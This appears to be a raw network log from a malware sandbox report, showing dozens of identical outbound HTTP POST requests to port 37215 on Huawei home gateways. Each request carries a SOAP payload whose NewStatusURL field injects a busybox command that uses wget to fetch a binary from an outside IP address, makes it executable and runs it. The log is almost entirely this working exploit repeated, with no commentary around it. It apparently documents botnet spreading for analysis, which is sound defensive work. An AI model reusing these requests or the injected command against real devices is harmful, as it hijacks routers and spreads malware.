                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2351192.168.2.153927441.4.73.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.807035923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2352192.168.2.154971641.24.202.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.807054996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2353192.168.2.155285241.145.248.4837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.807080984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2354192.168.2.153670041.144.92.19537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.807540894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2355192.168.2.154097841.91.222.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.807570934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2356192.168.2.153575441.160.3.9137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.807595968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2357192.168.2.154694841.121.17.17837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808007956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2358192.168.2.154876841.80.205.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808015108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2359192.168.2.155537841.130.67.20337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808043957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2360192.168.2.154881441.173.140.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808065891 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
